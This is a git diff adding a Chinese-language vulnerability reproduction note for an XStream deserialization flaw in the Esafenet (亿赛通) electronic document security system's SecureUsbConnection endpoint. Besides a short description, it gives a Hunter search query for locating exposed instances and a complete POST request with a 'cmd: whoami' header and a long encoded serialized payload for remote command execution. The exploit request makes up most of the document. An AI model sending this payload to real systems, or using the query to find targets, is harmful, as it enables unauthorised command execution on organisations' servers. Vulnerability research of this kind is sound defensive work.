@@ -0,0 +1,36 @@ +# 亿赛通电子文档安全管理系统SecureUsbConnection存在xstream 反序列化漏洞 + +# 一、漏洞简介 + 亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品,保护范围涵盖终端电脑(Windows、Mac、Linux系统平台)、智能终端(Android、IOS)及各类应用系统(OA、知识管理、文档管理、项目管理、PDM等)。亿赛通电子文档安全管理系统SecureUsbConnection存在xstream 反序列化漏洞 + +# 二、影响版本 ++ 亿赛通电子文档安全管理系统 + +# 三、资产测绘 ++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"` ++ 登录页面 + +![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/UMEwMTQGUBCHmlTs/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-025259.png) + +# 四、漏洞复现 +```plain +POST /CDGServer3/SecureUsbConnection HTTP/1.1 +Accept: */* +User-Agent: Mozilla/5.0 +Connection: close +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.8 +Content-Type: text/xml +Host: 192.168.110.187:8090 +cmd: whoami +Content-Length: 14756 + +NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMH
NNGMDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMFLNPKCD
PODPLMFFAMILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPOLIGHCLGMEJLKCHEPGBJCCDEC
FMKIBLFIGOFEJKPGAHIGOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAOCAAKGMNBCBENBLGLLLOKM
DMJANECALMLPLJNKGJKBLCIPBJBPMJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNHJFDPHILIKHMHJHBJBLPNPPPJ
OJJBDJHCPOCLBIBBPJLLMNKIOKPHOFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFLNAKEEEELCDLHDHBFOJBJF
HBOJNBGEOLIACBICKNMEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEGAEIPMBPBIHIABBILCOGDC
PKHJIPBLCLJEENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK +``` + +![1706604333973-57c3de91-84f6-484a-af9f-0de84ba3f891.png](./img/UMEwMTQGUBCHmlTs/1706604333973-57c3de91-84f6-484a-af9f-0de84ba3f891-321881.png) + + + +> 更新: 2024-04-20 22:01:34 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ahuzo9kgc2ggsydb> \ No newline at end of file diff --git a/亿赛通电子文档安全管理系统SecureUsbService存在SQL注入漏洞.md b/亿赛通电子文档安全管理系统SecureUsbService存在SQL注入漏洞.md new file mode 100644 index 0000000..e21ca7b --- /dev/null 
